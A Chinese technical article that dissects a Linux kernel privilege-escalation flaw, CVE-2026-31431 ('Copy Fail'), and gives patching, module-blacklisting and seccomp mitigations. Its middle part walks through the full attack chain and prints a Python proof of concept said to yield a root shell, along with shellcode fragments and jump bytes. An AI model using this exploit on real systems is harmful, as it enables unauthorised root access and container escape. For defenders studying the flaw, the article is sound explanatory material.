潜伏9年、影响所有主流发行版、仅需732字节Python脚本……这个漏洞为何被称为"核弹级"?我们从零开始,用图解+代码逐层拆解CVE-2026-31431的技术本质,并给出可落地的防御方案。
2026年4月,安全研究员披露了一个影响Linux内核长达9年的高危漏洞——CVE-2026-31431,代号"Copy Fail"。该漏洞自2017年Linux 4.14版本引入,几乎影响此后所有主流发行版(Ubuntu、Debian、CentOS、RHEL、SUSE、Amazon Linux等)。攻击者只需一个普通shell账号,即可稳定提权至root,甚至在容器环境中逃逸到宿主机。
CVSS评分为7.8(高危),但在多租户云环境和容器场景中,其实际危害远超数字本身。本文不渲染恐慌,只讲透技术:我们从页缓存、AF_ALG、splice等基础概念开始,用图解+代码逐步还原攻击链,并给出可落地的检测与防护方案。
当程序读取或执行一个文件时,Linux内核并不会每次都去读磁盘,而是将文件内容缓存在物理内存中,这部分内存称为页缓存(Page Cache)。后续所有读写操作都直接操作内存,再定期同步回磁盘。
磁盘上的 /usr/bin/su │ │ 第一次执行/读取 ▼内核物理内存:页缓存┌────────────────────────────┐│ su 二进制文件的内容(4KB分页) │└────────────────────────────┘ │ │ 后续所有读/执行都直接从内存取 ▼ 进程关键点:
AF_ALG(Address Family for Algorithm)是一种特殊的套接字类型,允许用户态程序直接使用内核实现的加密算法(如AES、SHA256、AEAD等),从而获得更好的性能和硬件加速支持。
使用AF_ALG计算SHA256哈希的典型流程如下:
int sock = socket(AF_ALG, SOCK_SEQPACKET, 0);bind(sock, (struct sockaddr*)&(struct sockaddr_alg){ .salg_type = "hash", .salg_name = "sha256"}, sizeof(...));int op = accept(sock, NULL, 0);write(op, data, datalen); // 写入待哈希数据read(op, digest, 32); // 读取哈希结果正是这种便利性,让AF_ALG成为很多上层加密库的后端。但也因为AF_ALG直接暴露内核加密路径,它成为了漏洞的"入口"。
splice()是一个Linux特有的系统调用,它可以在两个文件描述符之间直接移动数据,全程不用经过用户空间。它常用于高性能服务器,但同时也成了攻击者手中的利器。
ssize_tsplice(int fd_in, off_t *off_in, int fd_out, off_t *off_out, size_t len, unsignedint flags);关键限制:两个文件描述符中至少有一个必须是管道(pipe)。
splice()的核心价值在于零拷贝:它只是在内核内部重新映射内存页,而不是复制数据。
传统方式 read+write: 磁盘 → 内核缓冲区 → 用户缓冲区 → 内核缓冲区 → 目标splice方式: 磁盘 → 内核缓冲区 → (通过管道) → 目标缓冲区 全程数据未离开内核,页框直接重映射2017年7月,Linux内核合并了提交 72548b093ee3。该提交的目标是在 algif_aead 模块中启用 in-place 操作,以减少一次内存拷贝,提高数据吞吐量。
in-place 操作的核心假设:源缓冲区和目标缓冲区是同一块物理内存。但现实是,algif_aead 中源数据来自用户空间 sendmsg(),目标数据可能由 splice() 指向完全不同的物理页。当这个假设被错误地应用时,一个危险的漏洞窗口被打开了。
authencesn 是一种支持扩展序列号(ESN)的AEAD(认证加密)算法模板。它在处理解密时,为了存储序列号,会有意执行一次越界写入——向接收缓冲区 + assoclen + cryptlen 偏移处写入 4 字节。
// 伪代码:authencesn 内部逻辑voidauthencesn_decrypt(struct buffer *dst, u32 assoclen, u32 cryptlen, u32 esn) {// ... 正常解密 u32 *pos = (u32 *)(dst->data + assoclen + cryptlen); *pos = esn; // 写入 4 字节}在正常的socket接收缓冲区中,dst 是独立分配的内核内存,其大小恰好等于 assoclen + cryptlen + 4,因此这个写操作是边界内的,安全无害。
但漏洞开关出现了:当 in-place 优化启用时,内核会跳过某些边界检查,错误地认为 dst 就是源缓冲区(同一物理页)。而此时,攻击者可以通过 splice() 将 dst 替换成任意文件的页缓存。于是,那 4 字节就落入了目标文件的页缓存中。
攻击者选择一个 setuid root 的可执行文件作为篡改目标,例如 /usr/bin/su。这个文件的特点是:任何用户执行它,进程都会以 root 权限运行。
攻击者执行 ls -l /usr/bin/su-rwsr-xr-x 1 root root ... <-- s 位表示 setuid攻击者使用 splice() 完成零拷贝映射:
r, w = os.pipe()target_fd = open("/usr/bin/su", "rb")alg_sock = create_alg_socket("authencesn(...)")os.splice(target_fd, None, w, None, 4096, 0) # ① su页缓存 → 管道写端os.splice(r, None, alg_sock.fileno(), None, 4096, 0) # ② 管道读端 → socket接收缓冲区经过这两步,alg_sock 的接收缓冲区不再指向独立的内核内存,而是直接指向了 /usr/bin/su 的页缓存物理页。
磁盘 /usr/bin/su │ ▼ 内核页缓存(物理页框 0xABCD) ┌───────────────────────────┐ │ su 二进制代码(正常) │ └───────────────────────────┘ ▲ ▲ │ │ fd_su 视角 fd_alg 接收缓冲区视角 (文件内容) (AF_ALG算法认为的私有缓冲区)攻击者还需要在目标页缓存中提前放置一段shellcode。方式类似:创建一个包含shellcode的临时文件,用同样的 splice 技巧将其内容拼接到 su 页缓存的空闲区域(例如代码段末尾的填充区)。
// shellcode 功能:setuid(0); execve("/bin/sh");unsignedchar sc[] = "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05..."攻击者调用 recv(fd_alg, ...)。此时内核执行:
由于 dst 现在指向 su 页缓存,这 4 字节直接修改了 su 二进制在内存中的代码。攻击者让这 4 字节成为一条短跳转指令(JMP rel8),指向同一页内的shellcode。
修改前 su 页缓存:┌──────┬──────┬──────┬──────┐│ ... │ main │ ... │ 填充 │└──────┴──────┴──────┴──────┘ ↑ shellcode已预先注入修改后 su 页缓存:┌──────┬──────┬──────┬──────┐│ ... │ JMP │ ... │ 填充 │└──────┴──────┴──────┴──────┘ ↓ 跳转到shellcode攻击者只需在shell中执行:
$ /usr/bin/su由于 su 是setuid程序,内核会以 root 权限启动该进程。进程加载页缓存中的代码(已被篡改),第一条指令就是跳转到shellcode。shellcode调用 setuid(0) 将进程UID提升为root,再 execve("/bin/sh"),获得一个root shell。
以下是一个可直接运行的Python PoC核心代码(732字节简化版),逐行解释每个关键操作。
#!/usr/bin/env python3import socket, struct, os# 1. 创建AF_ALG socket并绑定存在漏洞的算法sock = socket.socket(38, 5, 0) # AF_ALG=38, SOCK_SEQPACKET=5sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))# 2. 打开目标setuid文件target_fd = open("/usr/bin/su", "rb")# 3. 创建管道,用于splice中转r, w = os.pipe()# 4. 第一次splice:su文件页缓存 → 管道写端os.splice(target_fd.fileno(), None, w, None, 4096, 0)# 5. 第二次splice:管道读端 → socket接收缓冲区os.splice(r, None, sock.fileno(), None, 4096, 0)# 6. 配置AEAD参数(关键:控制4字节写入的偏移)# ALG_SET_OP=4, value=1 表示解密sock.setsockopt(279, 4, struct.pack("<I", 1))# ALG_SET_ASSOCLEN=5, 设置关联数据长度sock.setsockopt(279, 5, struct.pack("<I", 0))# ALG_SET_CRYPTLEN=6, 设置密文长度 → assoclen+cryptlen=0x1A0sock.setsockopt(279, 6, struct.pack("<I", 0x1A0))# 7. 发送任意数据(IV和填充),触发算法准备sock.send(b"\x00" * 32)# 8. recv触发authencesn算法执行,完成4字节篡改sock.recv(4096)# 9. 执行被修改的su,获得root shellos.execl("/usr/bin/su", "su")关键点解析:
assoclen=0, cryptlen=0x1A0使得 assoclen+cryptlen = 0x1A0,这个偏移落在su二进制代码的关键位置(如main函数入口)0xEB 0x1E 0x90 0x90(短跳转指令 + NOP),跳转到同一页内预先放置的shellcode(可通过额外的splice注入)splice 实现零拷贝的核心是移动物理内存页框的引用,而不是复制数据。
初始:su文件页缓存 → 物理页框0x1000(存放su代码)第一次 splice(su_fd → pipe_w): 内核将页框0x1000的引用从文件页缓存"借"给管道的一个pipe_buffer 页框引用计数变为2第二次 splice(pipe_r → alg_fd): 内核从管道取出该引用,将其"移交"给socket接收缓冲区(skb->page) 页框引用计数仍为2(文件页缓存 + socket)最终:socket接收缓冲区与文件页缓存指向同一物理内存效果:任何写入socket接收缓冲区的操作(包括算法的4字节写入),都会直接修改 /usr/bin/su在内存中的代码。
漏洞需要两个条件同时满足:
单独任一条都不会造成危害:
数据流动路径:
用户态缓冲区 → send() → AF_ALG请求队列 → recv()触发算法 ↓ authencesn算法 ↓ 写入 socket接收缓冲区 (已被splice劫持) ↓ 直接修改 su文件页缓存 ↓ 执行 su → root shelljmp rel8仅需2字节,剩余2字节可填充NOP0xEB 0x1E 0x90 0x90(跳转偏移 +30字节,NOP填充)大多数内核漏洞需要复杂的堆布局或竞态窗口,Copy Fail是纯逻辑缺陷,一次调用即可成功。
攻击只修改内存中的页缓存,从不写磁盘。文件完整性监控(Tripwire、AIDE)完全失效。
Linux页缓存在宿主机范围内跨容器共享。一个被攻破的容器可以直接篡改宿主机或其他容器的页缓存,实现容器→宿主机逃逸。
所有主流发行版已合入补丁 a664bf3d603d。
sudo apt update && sudo apt upgradesudo yum update kernelsudo zypper patch升级后必须重启。
# 卸载模块(如果CONFIG_CRYPTO_USER_API_AEAD=m)sudo rmmod algif_aead# 禁用自动加载echo"install algif_aead /bin/false" | sudotee /etc/modprobe.d/disable-algif-aead.conf对于静态编译进内核的系统(如RHEL 9):
sudo grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"在容器或敏感服务中,使用seccomp过滤 socket(AF_ALG, ...)调用。
// 阻止 domain == 38 (AF_ALG)BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_socket, 0, 1),BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 38, 1, 0),lsmod | grep algif_aead探测脚本(无害):
import sockettry: s = socket.socket(38, 5, 0) s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))print("VULNERABLE")except:print("NOT vulnerable")Copy Fail 漏洞的演变路径令人深思:
一个为了性能的in-place优化 → 与特定算法的特殊越界行为结合 → 再遇到splice的强大重映射能力 → 最终演变为一个4字节控制整个系统的武器。
它提醒我们:安全与性能的权衡从未消失;系统的每一层抽象都可能成为攻击者串联利用的桥梁。
对于运维和开发人员,最重要的不是恐惧,而是理解技术本质。只有真正明白 splice() 如何重映射页缓存、authencesn 为何写入4字节、AF_ALG 如何暴露内核路径,我们才能设计出更健壮的防御体系。
立即行动:检查内核版本,评估受影响资产,优先升级。如果你无法重启系统,至少执行 rmmod algif_aead临时止血。
标签:#Linux内核 #安全漏洞 #CVE-2026-31431 #CopyFail #本地提权 #容器逃逸 #AF_ALG #splice #页缓存 #authencesn
适合人群:Linux系统管理员、安全工程师、容器运维、内核开发者、安全研究人员